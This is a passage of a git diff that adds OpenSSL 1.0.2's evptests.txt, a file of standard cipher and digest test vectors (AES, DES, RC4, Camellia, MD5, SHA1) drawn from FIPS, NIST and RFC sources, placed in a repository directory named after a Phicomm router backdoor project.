diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/evptests.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/evptests.txt
new file mode 100644
index 0000000..4e9958b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/evptests.txt
@@ -0,0 +1,401 @@
+#cipher:key:iv:plaintext:ciphertext:0/1(decrypt/encrypt)
+#aadcipher:key:iv:plaintext:ciphertext:aad:tag:0/1(decrypt/encrypt)
+#digest:::input:output
+
+# SHA(1) tests (from shatest.c)
+SHA1:::616263:a9993e364706816aba3e25717850c26c9cd0d89d
+
+# MD5 tests (from md5test.c)
+MD5::::d41d8cd98f00b204e9800998ecf8427e
+MD5:::61:0cc175b9c0f1b6a831c399e269772661
+MD5:::616263:900150983cd24fb0d6963f7d28e17f72
+MD5:::6d65737361676520646967657374:f96b697d7cb7938d525a2f31aaf161d0
+MD5:::6162636465666768696a6b6c6d6e6f707172737475767778797a:c3fcd3d76192e4007dfb496cca67e13b
+MD5:::4142434445464748494a4b4c4d4e4f505152535455565758595a6162636465666768696a6b6c6d6e6f707172737475767778797a30313233343536373839:d174ab98d277d9f5a5611c2c9f419d9f
+MD5:::3132333435363738393031323334353637383930313233343536373839303132333435363738393031323334353637383930313233343536373839303132333435363738393031323334353637383930:57edf4a22be3c955ac49da2e2107b67a
+
+# AES 128 ECB tests (from FIPS-197 test vectors, encrypt)
+
+AES-128-ECB:000102030405060708090A0B0C0D0E0F::00112233445566778899AABBCCDDEEFF:69C4E0D86A7B0430D8CDB78070B4C55A:1
+
+# AES 192 ECB tests (from FIPS-197 test vectors, encrypt)
+
+AES-192-ECB:000102030405060708090A0B0C0D0E0F1011121314151617::00112233445566778899AABBCCDDEEFF:DDA97CA4864CDFE06EAF70A0EC0D7191:1
+
+# AES 256 ECB tests (from FIPS-197 test vectors, encrypt)
+
+AES-256-ECB:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF:8EA2B7CA516745BFEAFC49904B496089:1
+
+# AES 128 ECB tests (from NIST test vectors, encrypt)
+
+#AES-128-ECB:00000000000000000000000000000000::00000000000000000000000000000000:C34C052CC0DA8D73451AFE5F03BE297F:1
+
+# AES 128 ECB tests (from NIST test vectors, decrypt)
+
+#AES-128-ECB:00000000000000000000000000000000::44416AC2D1F53C583303917E6BE9EBE0:00000000000000000000000000000000:0
+
+# AES 192 ECB tests (from NIST test vectors, decrypt)
+
+#AES-192-ECB:000000000000000000000000000000000000000000000000::48E31E9E256718F29229319C19F15BA4:00000000000000000000000000000000:0
+
+# AES 256 ECB tests (from NIST test vectors, decrypt)
+
+#AES-256-ECB:0000000000000000000000000000000000000000000000000000000000000000::058CCFFDBBCB382D1F6F56585D8A4ADE:00000000000000000000000000000000:0
+
+# AES 128 CBC tests (from NIST test vectors, encrypt)
+
+#AES-128-CBC:00000000000000000000000000000000:00000000000000000000000000000000:00000000000000000000000000000000:8A05FC5E095AF4848A08D328D3688E3D:1
+
+# AES 192 CBC tests (from NIST test vectors, encrypt)
+
+#AES-192-CBC:000000000000000000000000000000000000000000000000:00000000000000000000000000000000:00000000000000000000000000000000:7BD966D53AD8C1BB85D2ADFAE87BB104:1
+
+# AES 256 CBC tests (from NIST test vectors, encrypt)
+
+#AES-256-CBC:0000000000000000000000000000000000000000000000000000000000000000:00000000000000000000000000000000:00000000000000000000000000000000:FE3C53653E2F45B56FCD88B2CC898FF0:1
+
+# AES 128 CBC tests (from NIST test vectors, decrypt)
+
+#AES-128-CBC:00000000000000000000000000000000:00000000000000000000000000000000:FACA37E0B0C85373DF706E73F7C9AF86:00000000000000000000000000000000:0
+
+# AES tests from NIST document SP800-38A
+# For all ECB encrypts and decrypts, the transformed sequence is
+#   AES-bits-ECB:key::plaintext:ciphertext:encdec
+# ECB-AES128.Encrypt and ECB-AES128.Decrypt
+AES-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::6BC1BEE22E409F96E93D7E117393172A:3AD77BB40D7A3660A89ECAF32466EF97
+AES-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::AE2D8A571E03AC9C9EB76FAC45AF8E51:F5D3D58503B9699DE785895A96FDBAAF
+AES-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::30C81C46A35CE411E5FBC1191A0A52EF:43B1CD7F598ECE23881B00E3ED030688
+AES-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::F69F2445DF4F9B17AD2B417BE66C3710:7B0C785E27E8AD3F8223207104725DD4
+# ECB-AES192.Encrypt and ECB-AES192.Decrypt 
+AES-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::6BC1BEE22E409F96E93D7E117393172A:BD334F1D6E45F25FF712A214571FA5CC
+AES-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::AE2D8A571E03AC9C9EB76FAC45AF8E51:974104846D0AD3AD7734ECB3ECEE4EEF
+AES-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::30C81C46A35CE411E5FBC1191A0A52EF:EF7AFD2270E2E60ADCE0BA2FACE6444E
+AES-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::F69F2445DF4F9B17AD2B417BE66C3710:9A4B41BA738D6C72FB16691603C18E0E
+# ECB-AES256.Encrypt and ECB-AES256.Decrypt 
+AES-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::6BC1BEE22E409F96E93D7E117393172A:F3EED1BDB5D2A03C064B5A7E3DB181F8
+AES-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::AE2D8A571E03AC9C9EB76FAC45AF8E51:591CCB10D410ED26DC5BA74A31362870
+AES-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::30C81C46A35CE411E5FBC1191A0A52EF:B6ED21B99CA6F4F9F153E7B1BEAFED1D
+AES-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::F69F2445DF4F9B17AD2B417BE66C3710:23304B7A39F9F3FF067D8D8F9E24ECC7
+# For all CBC encrypts and decrypts, the transformed sequence is
+#   AES-bits-CBC:key:IV/ciphertext':plaintext:ciphertext:encdec
+# CBC-AES128.Encrypt and CBC-AES128.Decrypt 
+AES-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:7649ABAC8119B246CEE98E9B12E9197D
+AES-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:7649ABAC8119B246CEE98E9B12E9197D:AE2D8A571E03AC9C9EB76FAC45AF8E51:5086CB9B507219EE95DB113A917678B2
+AES-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:5086CB9B507219EE95DB113A917678B2:30C81C46A35CE411E5FBC1191A0A52EF:73BED6B8E3C1743B7116E69E22229516
+AES-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:73BED6B8E3C1743B7116E69E22229516:F69F2445DF4F9B17AD2B417BE66C3710:3FF1CAA1681FAC09120ECA307586E1A7
+# CBC-AES192.Encrypt and CBC-AES192.Decrypt 
+AES-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:4F021DB243BC633D7178183A9FA071E8
+AES-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:4F021DB243BC633D7178183A9FA071E8:AE2D8A571E03AC9C9EB76FAC45AF8E51:B4D9ADA9AD7DEDF4E5E738763F69145A
+AES-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:B4D9ADA9AD7DEDF4E5E738763F69145A:30C81C46A35CE411E5FBC1191A0A52EF:571B242012FB7AE07FA9BAAC3DF102E0
+AES-192-CBC:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:571B242012FB7AE07FA9BAAC3DF102E0:F69F2445DF4F9B17AD2B417BE66C3710:08B0E27988598881D920A9E64F5615CD
+# CBC-AES256.Encrypt and CBC-AES256.Decrypt 
+AES-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:F58C4C04D6E5F1BA779EABFB5F7BFBD6
+AES-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:F58C4C04D6E5F1BA779EABFB5F7BFBD6:AE2D8A571E03AC9C9EB76FAC45AF8E51:9CFC4E967EDB808D679F777BC6702C7D
+AES-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:9CFC4E967EDB808D679F777BC6702C7D:30C81C46A35CE411E5FBC1191A0A52EF:39F23369A9D9BACFA530E26304231461
+AES-256-CBC:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:39F23369A9D9BACFA530E26304231461:F69F2445DF4F9B17AD2B417BE66C3710:B2EB05E2C39BE9FCDA6C19078C6A9D1B
+# We don't support CFB{1,8}-AESxxx.{En,De}crypt
+# For all CFB128 encrypts and decrypts, the transformed sequence is
+#   AES-bits-CFB:key:IV/ciphertext':plaintext:ciphertext:encdec
+# CFB128-AES128.Encrypt 
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:3B3FD92EB72DAD20333449F8E83CFB4A:1
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:3B3FD92EB72DAD20333449F8E83CFB4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:C8A64537A0B3A93FCDE3CDAD9F1CE58B:1
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:C8A64537A0B3A93FCDE3CDAD9F1CE58B:30C81C46A35CE411E5FBC1191A0A52EF:26751F67A3CBB140B1808CF187A4F4DF:1
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:26751F67A3CBB140B1808CF187A4F4DF:F69F2445DF4F9B17AD2B417BE66C3710:C04B05357C5D1C0EEAC4C66F9FF7F2E6:1
+# CFB128-AES128.Decrypt 
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:3B3FD92EB72DAD20333449F8E83CFB4A:0
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:3B3FD92EB72DAD20333449F8E83CFB4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:C8A64537A0B3A93FCDE3CDAD9F1CE58B:0
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:C8A64537A0B3A93FCDE3CDAD9F1CE58B:30C81C46A35CE411E5FBC1191A0A52EF:26751F67A3CBB140B1808CF187A4F4DF:0
+AES-128-CFB:2B7E151628AED2A6ABF7158809CF4F3C:26751F67A3CBB140B1808CF187A4F4DF:F69F2445DF4F9B17AD2B417BE66C3710:C04B05357C5D1C0EEAC4C66F9FF7F2E6:0
+# CFB128-AES192.Encrypt
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CDC80D6FDDF18CAB34C25909C99A4174:1
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:CDC80D6FDDF18CAB34C25909C99A4174:AE2D8A571E03AC9C9EB76FAC45AF8E51:67CE7F7F81173621961A2B70171D3D7A:1
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:67CE7F7F81173621961A2B70171D3D7A:30C81C46A35CE411E5FBC1191A0A52EF:2E1E8A1DD59B88B1C8E60FED1EFAC4C9:1
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:2E1E8A1DD59B88B1C8E60FED1EFAC4C9:F69F2445DF4F9B17AD2B417BE66C3710:C05F9F9CA9834FA042AE8FBA584B09FF:1
+# CFB128-AES192.Decrypt
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CDC80D6FDDF18CAB34C25909C99A4174:0
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:CDC80D6FDDF18CAB34C25909C99A4174:AE2D8A571E03AC9C9EB76FAC45AF8E51:67CE7F7F81173621961A2B70171D3D7A:0
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:67CE7F7F81173621961A2B70171D3D7A:30C81C46A35CE411E5FBC1191A0A52EF:2E1E8A1DD59B88B1C8E60FED1EFAC4C9:0
+AES-192-CFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:2E1E8A1DD59B88B1C8E60FED1EFAC4C9:F69F2445DF4F9B17AD2B417BE66C3710:C05F9F9CA9834FA042AE8FBA584B09FF:0
+# CFB128-AES256.Encrypt 
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:DC7E84BFDA79164B7ECD8486985D3860:1
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:DC7E84BFDA79164B7ECD8486985D3860:AE2D8A571E03AC9C9EB76FAC45AF8E51:39FFED143B28B1C832113C6331E5407B:1
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:39FFED143B28B1C832113C6331E5407B:30C81C46A35CE411E5FBC1191A0A52EF:DF10132415E54B92A13ED0A8267AE2F9:1
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:DF10132415E54B92A13ED0A8267AE2F9:F69F2445DF4F9B17AD2B417BE66C3710:75A385741AB9CEF82031623D55B1E471:1
+# CFB128-AES256.Decrypt 
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:DC7E84BFDA79164B7ECD8486985D3860:0
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:DC7E84BFDA79164B7ECD8486985D3860:AE2D8A571E03AC9C9EB76FAC45AF8E51:39FFED143B28B1C832113C6331E5407B:0
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:39FFED143B28B1C832113C6331E5407B:30C81C46A35CE411E5FBC1191A0A52EF:DF10132415E54B92A13ED0A8267AE2F9:0
+AES-256-CFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:DF10132415E54B92A13ED0A8267AE2F9:F69F2445DF4F9B17AD2B417BE66C3710:75A385741AB9CEF82031623D55B1E471:0
+# For all OFB encrypts and decrypts, the transformed sequence is
+#   AES-bits-CFB:key:IV/output':plaintext:ciphertext:encdec
+# OFB-AES128.Encrypt 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:3B3FD92EB72DAD20333449F8E83CFB4A:1 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:50FE67CC996D32B6DA0937E99BAFEC60:AE2D8A571E03AC9C9EB76FAC45AF8E51:7789508D16918F03F53C52DAC54ED825:1 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:D9A4DADA0892239F6B8B3D7680E15674:30C81C46A35CE411E5FBC1191A0A52EF:9740051E9C5FECF64344F7A82260EDCC:1 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:A78819583F0308E7A6BF36B1386ABF23:F69F2445DF4F9B17AD2B417BE66C3710:304C6528F659C77866A510D9C1D6AE5E:1 
+# OFB-AES128.Decrypt 
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:3B3FD92EB72DAD20333449F8E83CFB4A:0
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:50FE67CC996D32B6DA0937E99BAFEC60:AE2D8A571E03AC9C9EB76FAC45AF8E51:7789508D16918F03F53C52DAC54ED825:0
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:D9A4DADA0892239F6B8B3D7680E15674:30C81C46A35CE411E5FBC1191A0A52EF:9740051E9C5FECF64344F7A82260EDCC:0
+AES-128-OFB:2B7E151628AED2A6ABF7158809CF4F3C:A78819583F0308E7A6BF36B1386ABF23:F69F2445DF4F9B17AD2B417BE66C3710:304C6528F659C77866A510D9C1D6AE5E:0
+# OFB-AES192.Encrypt 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CDC80D6FDDF18CAB34C25909C99A4174:1 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:A609B38DF3B1133DDDFF2718BA09565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:FCC28B8D4C63837C09E81700C1100401:1 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:52EF01DA52602FE0975F78AC84BF8A50:30C81C46A35CE411E5FBC1191A0A52EF:8D9A9AEAC0F6596F559C6D4DAF59A5F2:1 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:BD5286AC63AABD7EB067AC54B553F71D:F69F2445DF4F9B17AD2B417BE66C3710:6D9F200857CA6C3E9CAC524BD9ACC92A:1 
+# OFB-AES192.Decrypt 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:CDC80D6FDDF18CAB34C25909C99A4174:0 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:A609B38DF3B1133DDDFF2718BA09565E:AE2D8A571E03AC9C9EB76FAC45AF8E51:FCC28B8D4C63837C09E81700C1100401:0 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:52EF01DA52602FE0975F78AC84BF8A50:30C81C46A35CE411E5FBC1191A0A52EF:8D9A9AEAC0F6596F559C6D4DAF59A5F2:0 
+AES-192-OFB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B:BD5286AC63AABD7EB067AC54B553F71D:F69F2445DF4F9B17AD2B417BE66C3710:6D9F200857CA6C3E9CAC524BD9ACC92A:0 
+# OFB-AES256.Encrypt 
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:DC7E84BFDA79164B7ECD8486985D3860:1
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:B7BF3A5DF43989DD97F0FA97EBCE2F4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:4FEBDC6740D20B3AC88F6AD82A4FB08D:1
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E1C656305ED1A7A6563805746FE03EDC:30C81C46A35CE411E5FBC1191A0A52EF:71AB47A086E86EEDF39D1C5BBA97C408:1
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:41635BE625B48AFC1666DD42A09D96E7:F69F2445DF4F9B17AD2B417BE66C3710:0126141D67F37BE8538F5A8BE740E484:1
+# OFB-AES256.Decrypt 
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:DC7E84BFDA79164B7ECD8486985D3860:0
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:B7BF3A5DF43989DD97F0FA97EBCE2F4A:AE2D8A571E03AC9C9EB76FAC45AF8E51:4FEBDC6740D20B3AC88F6AD82A4FB08D:0
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:E1C656305ED1A7A6563805746FE03EDC:30C81C46A35CE411E5FBC1191A0A52EF:71AB47A086E86EEDF39D1C5BBA97C408:0
+AES-256-OFB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4:41635BE625B48AFC1666DD42A09D96E7:F69F2445DF4F9B17AD2B417BE66C3710:0126141D67F37BE8538F5A8BE740E484:0
+
+# AES Counter test vectors from RFC3686
+aes-128-ctr:AE6852F8121067CC4BF7A5765577F39E:00000030000000000000000000000001:53696E676C6520626C6F636B206D7367:E4095D4FB7A7B3792D6175A3261311B8:1
+aes-128-ctr:7E24067817FAE0D743D6CE1F32539163:006CB6DBC0543B59DA48D90B00000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F:5104A106168A72D9790D41EE8EDAD388EB2E1EFC46DA57C8FCE630DF9141BE28:1
+aes-128-ctr:7691BE035E5020A8AC6E618529F9A0DC:00E0017B27777F3F4A1786F000000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F20212223:C1CF48A89F2FFDD9CF4652E9EFDB72D74540A42BDE6D7836D59A5CEAAEF3105325B2072F:1
+
+aes-192-ctr:16AF5B145FC9F579C175F93E3BFB0EED863D06CCFDB78515:0000004836733C147D6D93CB00000001:53696E676C6520626C6F636B206D7367:4B55384FE259C9C84E7935A003CBE928:1
+aes-192-ctr:7C5CB2401B3DC33C19E7340819E0F69C678C3DB8E6F6A91A:0096B03B020C6EADC2CB500D00000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F:453243FC609B23327EDFAAFA7131CD9F8490701C5AD4A79CFC1FE0FF42F4FB00:1
+aes-192-ctr:02BF391EE8ECB159B959617B0965279BF59B60A786D3E0FE:0007BDFD5CBD60278DCC091200000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F20212223:96893FC55E5C722F540B7DD1DDF7E758D288BC95C69165884536C811662F2188ABEE0935:1
+
+aes-256-ctr:776BEFF2851DB06F4C8A0542C8696F6C6A81AF1EEC96B4D37FC1D689E6C1C104:00000060DB5672C97AA8F0B200000001:53696E676C6520626C6F636B206D7367:145AD01DBF824EC7560863DC71E3E0C0:1
+aes-256-ctr:F6D66D6BD52D59BB0796365879EFF886C66DD51A5B6A99744B50590C87A23884:00FAAC24C1585EF15A43D87500000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F:F05E231B3894612C49EE000B804EB2A9B8306B508F839D6A5530831D9344AF1C:1
+aes-256-ctr:FF7A617CE69148E4F1726E2F43581DE2AA62D9F805532EDFF1EED687FB54153D:001CC5B751A51D70A1C1114800000001:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F20212223:EB6C52821D0BBBF7CE7594462ACA4FAAB407DF866569FD07F48CC0B583D6071F1EC0E6B8:1
+
+# DES ECB tests (from destest)
+
+DES-ECB:0000000000000000::0000000000000000:8CA64DE9C1B123A7
+DES-ECB:FFFFFFFFFFFFFFFF::FFFFFFFFFFFFFFFF:7359B2163E4EDC58
+DES-ECB:3000000000000000::1000000000000001:958E6E627A05557B
+DES-ECB:1111111111111111::1111111111111111:F40379AB9E0EC533
+DES-ECB:0123456789ABCDEF::1111111111111111:17668DFC7292532D
+DES-ECB:1111111111111111::0123456789ABCDEF:8A5AE1F81AB8F2DD
+DES-ECB:FEDCBA9876543210::0123456789ABCDEF:ED39D950FA74BCC4
+
+# DESX-CBC tests (from destest)
+DESX-CBC:0123456789abcdeff1e0d3c2b5a49786fedcba9876543210:fedcba9876543210:37363534333231204E6F77206973207468652074696D6520666F722000000000:846B2914851E9A2954732F8AA0A611C115CDC2D7951B1053A63C5E03B21AA3C4
+
+# DES EDE3 CBC tests (from destest)
+DES-EDE3-CBC:0123456789abcdeff1e0d3c2b5a49786fedcba9876543210:fedcba9876543210:37363534333231204E6F77206973207468652074696D6520666F722000000000:3FE301C962AC01D02213763C1CBD4CDC799657C064ECF5D41C673812CFDE9675
+
+# RC4 tests (from rc4test)
+RC4:0123456789abcdef0123456789abcdef::0123456789abcdef:75b7878099e0c596
+RC4:0123456789abcdef0123456789abcdef::0000000000000000:7494c2e7104b0879
+RC4:00000000000000000000000000000000::0000000000000000:de188941a3375d3a
+RC4:ef012345ef012345ef012345ef012345::0000000000000000000000000000000000000000:d6a141a7ec3c38dfbd615a1162e1c7ba36b67858
+RC4:0123456789abcdef0123456789abcdef::123456789ABCDEF0123456789ABCDEF0123456789ABCDEF012345678:66a0949f8af7d6891f7f832ba833c00c892ebe30143ce28740011ecf
+RC4:ef012345ef012345ef012345ef012345::00000000000000000000:d6a141a7ec3c38dfbd61
+
+
+# Camellia tests from RFC3713
+# For all ECB encrypts and decrypts, the transformed sequence is
+#   CAMELLIA-bits-ECB:key::plaintext:ciphertext:encdec
+CAMELLIA-128-ECB:0123456789abcdeffedcba9876543210::0123456789abcdeffedcba9876543210:67673138549669730857065648eabe43
+CAMELLIA-192-ECB:0123456789abcdeffedcba98765432100011223344556677::0123456789abcdeffedcba9876543210:b4993401b3e996f84ee5cee7d79b09b9
+CAMELLIA-256-ECB:0123456789abcdeffedcba987654321000112233445566778899aabbccddeeff::0123456789abcdeffedcba9876543210:9acc237dff16d76c20ef7c919e3a7509
+
+# ECB-CAMELLIA128.Encrypt
+CAMELLIA-128-ECB:000102030405060708090A0B0C0D0E0F::00112233445566778899AABBCCDDEEFF:77CF412067AF8270613529149919546F:1
+CAMELLIA-192-ECB:000102030405060708090A0B0C0D0E0F1011121314151617::00112233445566778899AABBCCDDEEFF:B22F3C36B72D31329EEE8ADDC2906C68:1
+CAMELLIA-256-ECB:000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F::00112233445566778899AABBCCDDEEFF:2EDF1F3418D53B88841FC8985FB1ECF2:1
+
+# ECB-CAMELLIA128.Encrypt and ECB-CAMELLIA128.Decrypt 
+CAMELLIA-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::6BC1BEE22E409F96E93D7E117393172A:432FC5DCD628115B7C388D770B270C96
+CAMELLIA-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::AE2D8A571E03AC9C9EB76FAC45AF8E51:0BE1F14023782A22E8384C5ABB7FAB2B
+CAMELLIA-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::30C81C46A35CE411E5FBC1191A0A52EF:A0A1ABCD1893AB6FE0FE5B65DF5F8636
+CAMELLIA-128-ECB:2B7E151628AED2A6ABF7158809CF4F3C::F69F2445DF4F9B17AD2B417BE66C3710:E61925E0D5DFAA9BB29F815B3076E51A
+
+# ECB-CAMELLIA192.Encrypt and ECB-CAMELLIA192.Decrypt 
+CAMELLIA-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::6BC1BEE22E409F96E93D7E117393172A:CCCC6C4E138B45848514D48D0D3439D3
+CAMELLIA-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::AE2D8A571E03AC9C9EB76FAC45AF8E51:5713C62C14B2EC0F8393B6AFD6F5785A
+CAMELLIA-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::30C81C46A35CE411E5FBC1191A0A52EF:B40ED2B60EB54D09D030CF511FEEF366
+CAMELLIA-192-ECB:8E73B0F7DA0E6452C810F32B809079E562F8EAD2522C6B7B::F69F2445DF4F9B17AD2B417BE66C3710:909DBD95799096748CB27357E73E1D26
+
+# ECB-CAMELLIA256.Encrypt and ECB-CAMELLIA256.Decrypt 
+CAMELLIA-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::6BC1BEE22E409F96E93D7E117393172A:BEFD219B112FA00098919CD101C9CCFA
+CAMELLIA-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::AE2D8A571E03AC9C9EB76FAC45AF8E51:C91D3A8F1AEA08A9386CF4B66C0169EA
+CAMELLIA-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::30C81C46A35CE411E5FBC1191A0A52EF:A623D711DC5F25A51BB8A80D56397D28
+CAMELLIA-256-ECB:603DEB1015CA71BE2B73AEF0857D77811F352C073B6108D72D9810A30914DFF4::F69F2445DF4F9B17AD2B417BE66C3710:7960109FB6DC42947FCFE59EA3C5EB6B
+
+# For all CBC encrypts and decrypts, the transformed sequence is
+#   CAMELLIA-bits-CBC:key:IV/ciphertext':plaintext:ciphertext:encdec
+# CBC-CAMELLIA128.Encrypt and CBC-CAMELLIA128.Decrypt 
+CAMELLIA-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:000102030405060708090A0B0C0D0E0F:6BC1BEE22E409F96E93D7E117393172A:1607CF494B36BBF00DAEB0B503C831AB
+CAMELLIA-128-CBC:2B7E151628AED2A6ABF7158809CF4F3C:1607CF494B36BBF00DAEB0B503C831AB:AE2D8A571E03AC9C9EB76FAC45AF8E51:A2F2CF671629EF7840C5A5DFB5074887
